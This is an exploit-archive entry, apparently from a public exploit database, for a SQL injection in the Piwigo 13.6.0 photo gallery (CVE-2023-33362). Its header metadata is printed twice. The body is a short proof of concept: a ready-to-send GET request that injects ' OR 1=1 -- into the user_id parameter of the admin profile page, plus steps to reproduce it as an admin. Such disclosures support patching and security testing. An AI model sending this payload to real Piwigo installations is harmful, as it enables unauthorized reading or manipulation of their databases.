Piwigo 13.6.0 - SQL Injection
| EKU-ID: 56302 | CVE: CVE-2023-33362 | OSVDB-ID: |
| Author: CodeSecLab | Published: 2025-12-02 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 56302 | CVE: CVE-2023-33362 | OSVDB-ID: |
| Author: CodeSecLab | Published: 2025-12-02 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: Piwigo 13.6.0 - SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/Piwigo/Piwigo # Software Link: https://github.com/Piwigo/Piwigo # Version: 13.6.0 # Tested on: Windows # CVE : CVE-2023-33362 Proof Of Concept: GET /admin.php?page=profile&user_id=' OR 1=1 -- HTTP/1.1 Host: piwigo Steps to Reproduce Login as an admin user. Send the request. Observe the result